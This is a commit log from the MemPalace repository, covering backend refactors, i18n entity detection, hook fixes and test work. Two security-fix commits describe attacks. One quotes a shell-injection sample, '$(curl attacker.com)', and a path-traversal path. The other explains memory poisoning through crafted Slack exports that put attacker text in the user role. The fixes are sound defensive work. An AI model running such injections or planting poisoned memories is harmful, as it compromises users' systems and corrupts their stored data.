Commit Graph

130 Commits

Author SHA1 Message Date
Igor Lins e Silva 61dd6e7d9c test(backends): fix Windows file-lock in cache-invalidation test
PermissionError [WinError 32] is raised on Windows when Path.unlink() runs while
chromadb.PersistentClient still holds a handle on chroma.sqlite3. Rewrite
test_chroma_cache_invalidates_when_db_file_missing to prime
backend._clients/_freshness with a sentinel object instead of opening a
real PersistentClient, so the unlink runs against an unheld file.

The assertion is also corrected: after invalidation, ChromaBackend's
_client rebuilds a fresh PersistentClient which re-creates chroma.sqlite3
and re-stats it, so freshness ends up at the post-rebuild stat (not
(0, 0.0) as the assertion previously expected). The meaningful invariant
is "freshness advanced past the pre-unlink value AND the sentinel was
replaced", which the test now checks.
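
A minimal sketch of the freshness stamp this test reasons about, assuming the stamp is an (inode, mtime) pair with (0, 0.0) standing for a missing file. The names `db_freshness`, `cache_is_stale`, and `MISSING` are hypothetical and are not taken from chroma.py:

```python
import os

MISSING = (0, 0.0)  # assumed stamp for "database file does not exist"


def db_freshness(db_path):
    """Return an (inode, mtime) stamp for db_path, or MISSING if it is absent."""
    try:
        st = os.stat(db_path)
    except FileNotFoundError:
        return MISSING
    return (st.st_ino, st.st_mtime)


def cache_is_stale(cached_stamp, db_path):
    """A cached client is stale whenever the on-disk stamp differs from the cached one."""
    return db_freshness(db_path) != cached_stamp
```

Under these assumptions, deleting the file moves the stamp to MISSING, and a rebuild that re-creates the file moves it to a new non-zero stamp, which is why the test checks that freshness advanced rather than that it equals (0, 0.0).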

Ref: Windows CI failure on #995.
2026-04-18 13:52:56 -03:00
copilot-swe-agent[bot] 24bf97bb65 fix(tests): avoid ONNX network download in update-length validation tests
test_base_collection_update_default_validates_list_lengths and
test_base_collection_update_default_rejects_mismatched_lengths were
spinning up a real ChromaBackend and calling add(documents=...), which
triggered ChromaDB's default ONNX embedding function and attempted a
network download — failing in offline/sandboxed CI.

BaseCollection.update() validates list lengths before any DB access, so
no items need to be pre-loaded for the length-check to fire. Switch both
tests to use _FakeCollection (same as the rest of the unit tests in this
file) so they are pure in-memory and network-free.

Also fixes a structural bug in test 1: collection._collection.add() was
accidentally placed inside the pytest.raises(ValueError) block, masking
the real assertion.

Agent-Logs-Url: https://github.com/MemPalace/mempalace/sessions/55fc663e-b256-4b8b-88ce-4271560def8d

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>
2026-04-18 16:23:58 +00:00
Igor Lins e Silva 42b940d263 fix(backends): address Copilot review on #995
Four defects surfaced by the automated review, fixed with targeted tests:

1. BaseCollection.update() default now validates that documents / metadatas /
   embeddings lengths match ids, raising ValueError instead of silently
   misaligning pairs or raising IndexError (base.py).

2. ChromaCollection.query() now rejects the two ambiguous input shapes up
   front — neither or both of query_texts / query_embeddings, and empty input
   lists — with clear ValueError messages rather than delegating to chromadb's
   less-obvious errors (chroma.py).

3. QueryResult.empty() accepts embeddings_requested=True to preserve the
   outer-query dimension with empty hit lists when the caller asked for
   embeddings, matching the spec rule that included fields carry the outer
   shape even when empty (base.py). ChromaCollection.query() threads this
   through on the empty-result path (chroma.py).

4. ChromaBackend cache-freshness check now matches the semantics from
   mcp_server._get_client (merged via #757) on three edge cases Copilot
   called out: (a) invalidate when chroma.sqlite3 disappears while a cached
   client is held, (b) treat a 0→nonzero stat transition as a change so a
   cache built when the DB did not yet exist is refreshed, (c) re-stat
   after PersistentClient constructs the DB lazily so freshness reflects
   the post-creation state (chroma.py).
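
Items 1 and 2 describe up-front input validation. The sketch below shows one way such checks could look. The function names and error messages are illustrative assumptions, not the code in base.py or chroma.py:

```python
def check_update_lengths(ids, documents=None, metadatas=None, embeddings=None):
    """Raise ValueError if any provided list does not line up with ids."""
    fields = (
        ("documents", documents),
        ("metadatas", metadatas),
        ("embeddings", embeddings),
    )
    for name, values in fields:
        if values is not None and len(values) != len(ids):
            raise ValueError(
                f"{name} has {len(values)} items but ids has {len(ids)}"
            )


def check_query_inputs(query_texts=None, query_embeddings=None):
    """Require exactly one non-empty query input."""
    # True when both are None or both are given: the two ambiguous shapes.
    if (query_texts is None) == (query_embeddings is None):
        raise ValueError("pass exactly one of query_texts or query_embeddings")
    chosen = query_texts if query_texts is not None else query_embeddings
    if len(chosen) == 0:
        raise ValueError("query input list must not be empty")
```

Running both checks before any database access means a malformed call fails with a clear message regardless of which backend is installed.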

Tests: 978 passed (up from 970), 8 new tests covering the fixes.
2026-04-18 13:19:18 -03:00
Igor Lins e Silva a17a8b734a refactor(backends): typed QueryResult/GetResult, PalaceRef, BaseBackend registry (RFC 001 §10)
Advances RFC 001 §10 cleanup so backend-author PRs (#574 LanceDB, #665 Postgres,
#700 Qdrant, #697 hosted, #643 PalaceStore, #381 Qdrant) have a stable target
to align against.

Scope (this PR):

- Typed QueryResult / GetResult dataclasses replace Chroma's dict shape at
  the BaseCollection boundary (§1.3). A transitional _DictCompatMixin keeps
  existing callers working while the attribute-access migration proceeds.
- BaseCollection is now kwargs-only across add/upsert/query/get/delete/update
  with ABC defaults for estimated_count/close/health and a non-atomic default
  update() (§1.1–1.2).
- PalaceRef replaces raw path strings at the backend boundary (§2.2).
- BaseBackend ABC with get_collection/close_palace/close/health/detect (§2.3).
- mempalace.backends entry-point group + in-tree registry with
  resolve_backend_for_palace priority order matching §3.2–3.3.
- ChromaCollection normalizes chroma returns into typed results; unknown
  where-clause operators raise UnsupportedFilterError (no silent drop, §1.4).
- ChromaBackend absorbs the inode/mtime client-cache freshness check
  previously duplicated in mcp_server._get_client() (§10 + PR #757).
- searcher.py migrated to typed-attribute access as the reference call
  site; remaining callers land in a follow-up.
- pyproject: chroma registered via [project.entry-points."mempalace.backends"].

Out of scope (explicit follow-ups):

- Full caller migration off the dict-compat shim across palace.py,
  mcp_server.py, miner.py, convo_miner.py, dedup.py, repair.py, exporter.py,
  palace_graph.py, cli.py, closet_llm.py.
- Embedder injection + three-state EmbedderIdentityMismatchError check (§1.5).
- maintenance_state() / run_maintenance() benchmark hooks (§7.3).
- AbstractBackendContractSuite full coverage (§7.1–7.2).
- mempalace migrate / mempalace verify CLI rewrites through BaseCollection (§8).

Tests: 970 passed (up from 967 on develop); new coverage for typed results,
empty-result outer-shape preservation, $regex rejection, registry lookup,
priority resolver, and PalaceRef-kwarg ChromaBackend.get_collection.

Refs: #743 (RFC 001), #989 (RFC 002 tracking issue).
2026-04-18 12:45:16 -03:00
Igor Lins e Silva 55a004fe1e Merge pull request #931 from mvalentsev/fix/i18n-entity-metadata
fix: use i18n candidate patterns for entity extraction in miner and palace
2026-04-16 15:54:01 -03:00
Igor Lins e Silva c5e249bba8 Merge pull request #946 from mvalentsev/fix/utf8-read-text
fix: add explicit UTF-8 encoding to read_text() calls (#776)
2026-04-16 15:52:42 -03:00
Igor Lins e Silva 65f99ad7e6 Merge pull request #928 from arnoldwender/fix/i18n-lang-case-insensitive
fix(i18n): resolve language codes case-insensitively (#927)
2026-04-16 15:44:36 -03:00
mvalentsev 09fe2dda3c fix: add explicit UTF-8 encoding to read_text() calls (#776)
On Windows with non-UTF-8 locale (e.g. GBK), Path.read_text() defaults
to platform encoding, breaking onboarding tests and any source code that
reads JSON/markdown with non-ASCII content.

5 files, 8 call sites fixed.
2026-04-16 16:00:29 +05:00
🍕 88f5b5fa0e Add Indonesian language support
Introduces the Indonesian (id) locale, providing translations for CLI commands, status messages, and core terminology.

Includes language-specific regex patterns for stop words and action detection to support text processing and indexing in Indonesian. The test suite is updated with a sample case to verify correct dialect handling and compression.
2026-04-16 16:15:47 +08:00
mvalentsev 8bf940f861 fix: use i18n candidate patterns for entity extraction in miner and palace
entity_detector.py was refactored in #911 to load candidate patterns
from i18n locale JSON files, supporting non-Latin scripts (Cyrillic,
accented Latin, etc.). But three other code paths still hardcoded the
ASCII-only regex [A-Z][a-z]{2,}, silently missing non-Latin entity
names in metadata tagging, closet indexing, and registry lookups.

Replace the hardcoded regex with a shared _candidate_entity_words()
helper that reuses the same i18n candidate_patterns as entity_detector.
2026-04-16 10:35:40 +05:00
Igor Lins e Silva f895bc58e6 fix(entity_detector): script-aware word boundaries for combining-mark scripts
Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras)
like ा ी ु are Unicode combining marks (category Mc or Mn), which are not \w.
This means \b splits mid-word on every matra: names like अनीता (Anita)
truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b
never match because \b fails after the final matra of कहा.

Same issue affects Arabic, Hebrew, Thai, Tamil, and every other script
whose words contain combining marks.

Fix: locales with combining-mark scripts declare a boundary_chars field
in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n
loader replaces every \b in that locale's patterns with a script-aware
lookaround that treats the declared characters as "inside-word", and
pre-wraps candidate/multi_word patterns with the same boundary.

Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru,
it are unchanged.
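
The truncation and the lookaround fix can be reproduced with the standard re module. This is a sketch under stated assumptions: the candidate pattern here is a bare Devanagari character class, and the way the lookarounds are assembled is illustrative rather than the loader's actual `_script_boundary` code:

```python
import re

# "Anita" in Devanagari, written with escapes:
# a, na, vowel sign ii, ta, vowel sign aa.
name = "\u0905\u0928\u0940\u0924\u093e"

# Naive pattern: \b sees the trailing vowel sign as a non-word character,
# so the match is forced to stop one character early.
naive = re.compile(r"\b[\u0900-\u097F]+\b")

# Script-aware boundary: lookarounds that treat the declared characters
# as "inside-word" (same value as the Hindi boundary_chars example).
boundary_chars = r"\w\u0900-\u097F"
aware = re.compile(
    rf"(?<![{boundary_chars}])[\u0900-\u097F]+(?![{boundary_chars}])"
)

naive_hits = naive.findall(name)  # the name without its final vowel sign
aware_hits = aware.findall(name)  # the full name
```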

Changes:
- mempalace/i18n/__init__.py: add _script_boundary, _expand_b,
  _wrap_candidate, _collect_entity_section; candidate_patterns are now
  returned fully-wrapped (boundary + capture group applied)
- mempalace/entity_detector.py: extract_candidates compiles pre-wrapped
  candidate patterns directly instead of re-wrapping with \b
- tests/test_entity_detector.py: 5 new tests for Devanagari boundaries
  (name extraction with/without boundary_chars, person-verb firing,
  English regression)
2026-04-15 22:18:52 -03:00
Arnold Wender 0174b93d0f fix(i18n): resolve language codes case-insensitively (#927)
BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the
locale files mix conventions (pt-br.json vs zh-CN.json). On
case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently
missed the file, _load_entity_section returned {}, and entity
detection ran in English with no warning.

The cache key in get_entity_patterns was built from raw input, so
('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong.

Add _canonical_lang(lang) that resolves any casing to the on-disk
filename stem via lowercase comparison, and route load_lang,
_load_entity_section, and the cache key through it.
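
A sketch of the lowercase-comparison lookup described above. The signature is an assumption: this version takes the list of on-disk filename stems as an argument, whereas the real `_canonical_lang(lang)` presumably discovers them itself. `cache_key` is a hypothetical helper added to show the effect on cache keys:

```python
def canonical_lang(lang, available_stems):
    """Map any casing of lang to the matching on-disk stem, or None."""
    wanted = lang.lower()
    for stem in available_stems:
        if stem.lower() == wanted:
            return stem
    return None


def cache_key(langs, available_stems):
    """Build a cache key from canonical stems so casing variants share one slot."""
    return tuple(canonical_lang(lang, available_stems) or lang for lang in langs)


stems = ["en", "pt-br", "zh-CN"]  # mixed conventions, as in the locale files
```

With this, `cache_key(("PT-BR",), stems)` and `cache_key(("pt-br",), stems)` produce the same tuple, so the two spellings no longer create separate cache entries.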

Closes #927
2026-04-15 23:33:42 +02:00
Igor Lins e Silva 312b3b5f0e Merge pull request #758 from mvalentsev/fix/i18n-review-issues
fix: address i18n review issues from PR #718
2026-04-15 13:45:49 -03:00
Igor Lins e Silva c722c91e2a test: document orphan-locale recovery for _temp_locale helper
2026-04-15 08:54:23 -03:00
Igor Lins e Silva b214aced90 refactor(entity_detector): make multi-language extensible via i18n JSON
Move all entity-detection lexical patterns (person verbs, pronouns,
dialogue markers, project verbs, stopwords, candidate character class)
out of hardcoded module-level constants and into the entity section of
each locale's JSON in mempalace/i18n/. Adds a languages parameter to
every public function so callers union patterns across the desired
locales. The default stays ("en",), so all existing callers and tests
behave unchanged.

Also adds:
- get_entity_patterns(langs) helper in mempalace/i18n/ that merges
  patterns across requested languages, dedupes lists, unions stopwords,
  and falls back to English for unknown locales
- MempalaceConfig.entity_languages property + setter, with env var
  override (MEMPALACE_ENTITY_LANGUAGES, comma-separated)
- mempalace init --lang en,pt-br flag (persists to config.json)
- Per-language candidate_pattern so non-Latin scripts (Cyrillic,
  Devanagari, CJK) can register their own character classes instead of
  being silently dropped by the ASCII-only [A-Z][a-z]+ default
- _build_patterns LRU cache keyed by (name, languages) so multi-language
  callers don't poison each other's cache slots

Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only
add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that
needed entity_detector changes and inlined a _PTBR variant of every
constant. That doesn't scale past 2-3 languages — every text gets
checked against every language's patterns regardless of relevance, and
candidate extraction still drops accented and non-Latin names.

This PR sets the standard so future locale contributors only edit one
JSON file (no Python changes), and entity detection scales linearly
with how many languages a user actually enabled, not how many ship.
2026-04-15 08:52:42 -03:00
Igor Lins e Silva 56b6a6360f Merge pull request #908 from fatkobra/test/palace-graph-tunnels
test: add palace_graph tunnel helper coverage
2026-04-15 08:23:18 -03:00
fatkobra 966937d620 test: add palace_graph tunnel helper coverage
Adds focused tests for explicit tunnel helpers in `mempalace/palace_graph.py`.

Covered:
- `_load_tunnels`
- `_save_tunnels`
- `create_tunnel`
- `list_tunnels`
- `delete_tunnel`
- `follow_tunnels`
2026-04-15 11:38:18 +02:00
Marcio E. Heiderscheidt e61dc2adf8 fix: add provenance header and speaker IDs to Slack transcript imports (#815)
* fix: add provenance header and speaker IDs to Slack transcript imports

Slack exports are multi-party chats where no speaker is inherently
the "user" or "assistant". The parser previously assigned these roles
purely by position, allowing a crafted export to place attacker text
in the "user" role — making it appear as the memory owner's words
in all future retrieval (data poisoning via stored memory).

Changes:
- Add provenance header marking Slack transcripts as multi-party
  with positional (unverified) role assignment
- Prefix each message with the original speaker ID ([U1], [U2], etc.)
  so downstream consumers can distinguish authors
- Keep user/assistant role alternation for exchange-pair chunking
  compatibility with convo_miner.py

Tests:
- Provenance header presence and content
- Speaker ID preservation in output
- Attacker-first-message attribution verification

Refs: MemPalace/mempalace#809

* fix: move Slack provenance to footer, sanitize speaker IDs, extract constant

- Move provenance notice from header to footer to prevent it becoming
  a standalone ChromaDB drawer via paragraph chunking on exports
  with fewer than 3 exchange pairs (violates verbatim-always principle)
- Sanitize speaker user_id/username: strip brackets, newlines, and
  control characters to prevent chunk-boundary injection via crafted
  Slack exports
- Extract header string to _SLACK_PROVENANCE_FOOTER module constant,
  consistent with _TOOL_RESULT_* constants pattern; tests import it
  instead of duplicating the literal

Refs: MemPalace/mempalace#809
2026-04-15 00:27:01 -07:00
sha2fiddy a15094ce60 feat: include created_at timestamp in search results (#846)
* feat: include created_at timestamp in search results (closes #465)

Surface the existing filed_at metadata as created_at in search result
objects returned by search_memories(). Enables temporal reasoning over
search hits without additional queries.

* Feat: add fallback for missing filed_at metadata
2026-04-15 00:26:57 -07:00
Mikhail Valentsev ecd44f7cb7 fix(hooks): stop precompact hook from blocking compaction (#856, #858) (#863)
* fix(hooks): stop precompact hook from blocking compaction

The precompact hook unconditionally returned {"decision": "block"},
which in Claude Code means "cancel compaction" with no retry mechanism.
This made /compact permanently broken for all plugin users.

Changed hook_precompact() to mine the transcript synchronously (so data
lands before compaction) and return {"decision": "allow"}. This matches
the standalone bash hook in hooks/ which already uses allow.

Also extracted _get_mine_dir() and _mine_sync() helpers so precompact
can mine from the transcript directory, not just MEMPAL_DIR.

Stop hook behavior is unchanged -- left for #673 which implements the
full silent save path.

Closes #856, closes #858.

* fix: use empty JSON instead of invalid "allow" decision value

Claude Code only recognizes "block" as a top-level decision value.
"allow" is a permissionDecision value for PreToolUse hooks, not a
valid top-level decision. The correct way to not block is to return
empty JSON. Caught by #872.
2026-04-15 00:26:54 -07:00
Arnold Wender b226251ddf fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) (#864)
* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225)

Fixes #225.

Several transitive dependencies (chromadb, onnxruntime, posthog) print
banners and warnings to stdout — sometimes at the C level — during the
mcp_server import chain. Because the MCP protocol multiplexes JSON-RPC
over stdio, any non-JSON output on stdout corrupted the message stream
and broke Claude Desktop's parser with errors like:

  MCP mempalace: Unexpected token '*', "**********"... is not valid JSON
  MCP mempalace: Unexpected token 'E', "EP Error D"... is not valid JSON
  MCP mempalace: Unexpected token 'F', "Falling ba"... is not valid JSON

Reproduced on Windows 11 with mempalace 3.0.0 / Python 3.10 / Claude
Desktop 1.1062.0.

Fix: at module load, redirect stdout to stderr at both the Python level
(sys.stdout = sys.stderr) and the file-descriptor level (os.dup2(2, 1))
to catch C-level prints, while preserving the real stdout for later
restore. main() calls _restore_stdout() right before entering the
protocol loop so JSON-RPC responses still go to the real stdout.
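
The two-level redirect can be sketched as follows. This is an illustration of the technique, not the code in mcp_server.py: the function names and module-level variables are hypothetical, and the sketch assumes file descriptors 1 and 2 are open:

```python
import os
import sys

_saved_fd = None      # duplicate of the real stdout file descriptor
_saved_stream = None  # the original sys.stdout object


def redirect_stdout_to_stderr():
    """Send both Python-level and C-level stdout writes to stderr."""
    global _saved_fd, _saved_stream
    if _saved_fd is not None:
        return  # already redirected
    sys.stdout.flush()
    _saved_stream = sys.stdout
    _saved_fd = os.dup(1)    # keep the real stdout reachable
    os.dup2(2, 1)            # fd 1 now points at stderr (catches C prints)
    sys.stdout = sys.stderr  # Python-level prints follow


def restore_stdout():
    """Undo the redirect; safe to call more than once."""
    global _saved_fd, _saved_stream
    if _saved_fd is None:
        return
    sys.stdout.flush()
    os.dup2(_saved_fd, 1)    # fd 1 points at the real stdout again
    os.close(_saved_fd)
    sys.stdout = _saved_stream
    _saved_fd = None
    _saved_stream = None
```

The descriptor-level `os.dup2` is what covers output written by native libraries, which bypass `sys.stdout` entirely.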

Adds tests/test_mcp_stdio_protection.py with three regression tests:
- module-level redirect is in place after import
- _restore_stdout() restores the original stdout (idempotent)
- 'python -m mempalace.mcp_server' with empty stdin emits no stdout

* style: reformat with ruff 0.4 (CI version) for #225
2026-04-15 00:26:51 -07:00
Arnold Wender 0aee6f3ed9 fix(init): auto-add per-project files to .gitignore in git repos (#185) (#866)
Partially addresses #185.

`mempalace init <dir>` writes `mempalace.yaml` and `entities.json` into
the project root. When <dir> is a git repository, those files have no
default protection and risk being committed by accident — the loudest
concern in the original report.

This PR adds `_ensure_mempalace_files_gitignored()` which runs at the
end of cmd_init: if <dir>/.git exists, append the two filenames to
.gitignore (creating it if necessary) under a clearly-marked block.

The helper is conservative:
- only runs when <dir>/.git is present (no-op for non-git projects)
- skips entries already present (no duplicates)
- preserves existing .gitignore content
- handles files without trailing newlines
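
The four conservative behaviours above can be sketched with pathlib. The function name, the marker comment text, and the boolean return value are assumptions made for illustration, not the implementation of `_ensure_mempalace_files_gitignored()`:

```python
from pathlib import Path

PROTECTED = ("mempalace.yaml", "entities.json")
MARKER = "# mempalace per-project files"  # hypothetical block label


def ensure_gitignored(project_dir):
    """Append missing entries to .gitignore; return True if the file changed."""
    root = Path(project_dir)
    if not (root / ".git").exists():
        return False  # not a git repository: do nothing

    gitignore = root / ".gitignore"
    existing = gitignore.read_text(encoding="utf-8") if gitignore.exists() else ""
    present = {line.strip() for line in existing.splitlines()}
    missing = [name for name in PROTECTED if name not in present]
    if not missing:
        return False  # already protected: no duplicates

    prefix = existing
    if prefix and not prefix.endswith("\n"):
        prefix += "\n"  # repair a missing trailing newline before appending
    block = "\n".join([MARKER, *missing]) + "\n"
    gitignore.write_text(prefix + block, encoding="utf-8")
    return True
```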

This does NOT relocate the files to ~/.mempalace/wings/<wing>/ as the
issue's 'Expected' section proposes — that's a behavioral change with
miner/config implications and warrants a separate design discussion.
The gitignore safeguard removes the immediate risk without breaking any
existing flow.

Tests: 5 cases in tests/test_init_gitignore_protection.py covering
no-op, fresh creation, partial append, idempotency, and missing-newline
edge case.
2026-04-15 00:26:41 -07:00
Arnold Wender 6a73eb2e20 fix(searcher): guard against empty ChromaDB query results (#195) (#865)
Fixes #195.

When ChromaDB returns no documents (empty palace, or wing/room filter
that excludes everything), it returns the shape:

    {"documents": [], "metadatas": [], "distances": []}

Indexing `results["documents"][0]` blindly raises IndexError instead of
the expected 'no results' response. Affected: searcher.search(),
searcher.search_memories() (drawer + closet branches plus the
total_before_filter aggregate), and Layer3.search() / Layer3.search_raw().

Adds a tiny private helper `searcher._first_or_empty(results, key)` that
safely extracts the inner list, returning [] for any of: missing key,
empty outer list, [None], or [[]]. layers.py imports the same helper to
avoid duplicating the guard.
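
A sketch of a guard with the behaviour described above, written from the description rather than copied from searcher.py, so the body is an assumption:

```python
def first_or_empty(results, key):
    """Return the first inner list under key, or [] for any empty shape."""
    outer = results.get(key)
    if not outer:        # missing key, None, or empty outer list
        return []
    inner = outer[0]
    return inner if inner else []  # covers [None] and [[]]
```

Callers can then iterate over `first_or_empty(results, "documents")` without checking the shape first.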

Tests: tests/test_empty_chromadb_results.py covers all observed shapes
plus a documentation-style test that pins the original IndexError so
future readers understand why the helper exists.
2026-04-15 00:26:38 -07:00
Mikhail Valentsev 54a386d925 fix: return empty status instead of error on cold-start palace (#830) (#831)
tool_status() called _get_collection() with the default create=False,
which throws when the ChromaDB collection does not exist yet (valid
palace, zero drawers). The exception was swallowed and status returned
"No palace found" even though init had completed successfully.

Switching to create=True bootstraps an empty collection on first
status call, matching what the write path already does.

Fix suggested by @hkevinchu in the issue.
2026-04-15 00:26:35 -07:00
Marcio E. Heiderscheidt f20f45a2da fix: make entity_registry.research() local-only by default (#811)
* fix: make entity_registry.research() local-only by default

research() previously called _wikipedia_lookup() unconditionally,
sending entity names to en.wikipedia.org on every uncached lookup.
This violates the project's local-first and privacy-by-architecture
principles documented in CLAUDE.md.

Changes:
- research() now returns "unknown" for uncached words by default
- New allow_network=True parameter required for Wikipedia lookups
- Wikipedia 404 now returns "unknown" instead of asserting "person"
  with 0.70 confidence, preventing entity registry poisoning
- Added privacy warning docstring to _wikipedia_lookup()
- Added tests for local-only default, opt-in network, 404 handling,
  and cache-not-persisted-on-local-only behaviour

Refs: MemPalace/mempalace#809

* fix: improve research() cache read path and deduplicate test mocks

- Use .get() instead of .setdefault() for cache reads in research()
  so the local-only path never mutates _data unnecessarily
- Move .setdefault() to the network-write path only
- Use result.setdefault() for word/confirmed keys to ensure
  consistent return shape across all _wikipedia_lookup error paths
- Extract duplicated mock_result dict into _MOCK_SAOIRSE_PERSON
  constant shared by 3 test functions
2026-04-15 00:26:24 -07:00
mvalentsev d565718922 fix: address i18n review issues from PR #718
Three issues flagged by bensig on the i18n PR before merge:

1. ko.json: status_drawers used {drawers} instead of {count}, causing
   the Korean UI to show the raw template string instead of the actual
   drawer count.  All other 7 languages use {count}.

2. Test file was shipped inside the package at mempalace/i18n/test_i18n.py
   with a sys.path.insert hack.  Moved to tests/test_i18n.py per the
   project convention in AGENTS.md.

3. Dialect.from_config() passed lang=config.get("lang") which defaults
   to None, causing __init__ to inherit whatever language was loaded
   earlier via module-level state.  Now defaults to "en" explicitly so
   from_config is deterministic regardless of prior load_lang() calls.

Added two regression tests for the ko.json fix and the state leak.
2026-04-15 11:03:28 +05:00
Igor Lins e Silva 107685930d docs+tests: fix CI after README slim (#875)
The regression-guard tests added in #835 were pinned to the old
README shape (tool table + file-reference table). When #897 slimmed
the README and moved that content to the website, three tests
started failing:

  TestReadmeToolsExistInCode.test_every_readme_tool_exists_in_tools_dict
  TestNoUnlistedTools.test_no_undocumented_tools
  TestReadmeDialectNotLossless.test_readme_dialect_line_not_lossless

Changes in this commit:

1. Update the 3 tests to track the new canonical docs surfaces
   - Tool list -> website/reference/mcp-tools.md
     (tests parse `### \`mempalace_xxx\`` headings instead of
     markdown table rows).
   - dialect.py lossless disclaimer -> website/reference/modules.md
     (any line mentioning dialect.py must not also say "lossless").

2. Fix the website to make "no undocumented tools" true
   Add the 10 tools that existed in TOOLS but were missing from
   website/reference/mcp-tools.md (create_tunnel, delete_tunnel,
   follow_tunnels, list_tunnels, get_drawer, list_drawers,
   update_drawer, hook_settings, memories_filed_away, reconnect).
   Page header now correctly says "all 29 MCP tools".

3. Align pre-commit ruff pin to match CI (0.4.x)
   .pre-commit-config.yaml was pinning ruff v0.9.0, while
   .github/workflows/ci.yml installs ruff>=0.4.0,<0.5. The two
   formatters produce incompatible output (e.g. v0.9.0 reformats
   `assert (x), msg` -> `assert x, (msg)` in a way v0.4.x rejects),
   which would cause the pre-commit hook to modify files that CI
   then flags as unformatted. Pinning the hook to v0.4.10 keeps
   the dev loop and CI in lock-step.

Full suite: 887 passed, 0 failed.
2026-04-14 21:59:55 -03:00
MSL 3094c0bd10 fix: add missing self._lock to KnowledgeGraph.close()
TDD: test first, failed, fixed, passed.

Igor fixed query_relationship/timeline/stats in an earlier commit.
close() was the last method touching self._connection without
holding the lock.

Closes #883.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-14 13:09:10 -07:00
Igor Lins e Silva c9b3245994 Merge pull request #880 from MemPalace/perf-optimize-regex-compilation-15578943484596502942
Optimize regex compilation in entity extraction
2026-04-14 15:10:34 -03:00
Milla J 3ac75d0fdb feat: add MEMPAL_VERBOSE toggle — developers see diaries in chat (#871)
export MEMPAL_VERBOSE=true  → hook blocks, agent writes diary in chat
export MEMPAL_VERBOSE=false → silent background save (default)

Developers need to see code and diaries being written.
Regular users want zero chat clutter. Now both work.

TDD: tests written first, failed, code fixed, tests pass.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-14 10:55:56 -07:00
google-labs-jules[bot] 21793cfb48 perf: optimize regex compilation in entity extraction
Move regular expression compilation to the module level in `dialect.py` to prevent repeated parsing during loop execution.

Co-authored-by: igorls <4753812+igorls@users.noreply.github.com>
2026-04-14 17:43:26 +00:00
Igor Lins e Silva 4741bc0055 Merge pull request #873 from sha2fiddy/feature/455/kg-sanitize-punctuation
fix: use permissive validator for KG entity values
2026-04-14 14:15:33 -03:00
Igor Lins e Silva e1d24d8087 Merge pull request #812 from Kesshite/fix/security-hook-injection
fix: harden hooks against shell injection, path traversal, and arithmetic injection
2026-04-14 14:10:33 -03:00
Matt Van Horn e8e93b53c0 fix: allow mining directories without local mempalace.yaml
When no mempalace.yaml or mempal.yaml exists in the source directory,
return a default config (wing = directory name, room = general) instead
of calling sys.exit(1). This lets users mine any directory into their
palace without requiring init first.

Closes #14.
2026-04-14 13:53:07 -03:00
eblander 79c9c0e517 fix: use permissive validator for KG entity values (closes #455)
sanitize_name rejects commas, colons, parentheses, and slashes — characters
that commonly appear in knowledge graph subject/object values. Adds
sanitize_kg_value for KG entity fields (subject, object, entity) while
keeping sanitize_name for predicates and wing/room names.
2026-04-14 09:26:47 -04:00
BLUDATA\marcio.heiderscheidt f7d703fd5b fix: add logging on rejected transcript paths and platform-native path test
- _count_human_messages() now logs a WARNING via _log() when a
  non-empty transcript_path is rejected by the validator, making
  silent auto-save failures diagnosable via hook.log
- Add test for platform-native paths (backslashes on Windows) to
  verify _validate_transcript_path works cross-platform
- Add test verifying the warning log is emitted on rejection

Refs: MemPalace/mempalace#809
2026-04-14 07:54:42 -03:00
BLUDATA\marcio.heiderscheidt 0f217f7c80 fix: harden hooks against shell injection, path traversal, and arithmetic injection
save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files
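
A sketch of the two rejection rules named above, using pathlib. The function name is hypothetical, rejecting the empty string is an assumption, and the real `_validate_transcript_path()` may apply further checks:

```python
from pathlib import Path

ALLOWED_SUFFIXES = {".jsonl", ".json"}


def is_valid_transcript_path(raw):
    """Accept only .jsonl/.json paths that contain no '..' component."""
    if not raw:
        return False  # assumption: empty input is treated as invalid
    path = Path(raw)
    if ".." in path.parts:
        return False  # path traversal attempt
    return path.suffix.lower() in ALLOWED_SUFFIXES
```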

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace/mempalace#809
2026-04-14 07:54:42 -03:00
Igor Lins e Silva 267a644f4f refactor: route all chromadb access through ChromaBackend
Prerequisite for RFC 001 (plugin spec, #743). Removes every direct
`import chromadb` outside the ChromaDB backend itself so the core
modules depend only on the backend abstraction layer.

Extends ChromaBackend with make_client, get_or_create_collection,
delete_collection, create_collection, and backend_version. Adds
update() to the BaseCollection contract. Non-backend callers
(mcp_server, dedup, repair, migrate, cli) now go through the
abstraction; tests patch ChromaBackend instead of chromadb.

With this landed, the RFC 001 spec can be enforced and PalaceStore
(#643) can ship as a plugin without touching core modules.
2026-04-14 00:31:16 -03:00
Milla J 045023f449 fix: save hook auto-mines transcript without MEMPAL_DIR (#840)
TDD: test written first, failed, then fixed.

Problem: save hook says "saved in background" but MEMPAL_DIR defaults
to empty, so nothing actually mines. Users get no auto-save despite
the hook firing every 15 messages.

Fix: use TRANSCRIPT_PATH (received from Claude Code in the hook's
JSON input) to discover the session directory. Mine that directory
automatically. MEMPAL_DIR is still supported as override but no
longer required.

Also fixed: bare python3 → $(command -v python3) for nohup safety.

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
2026-04-13 18:09:59 -07:00
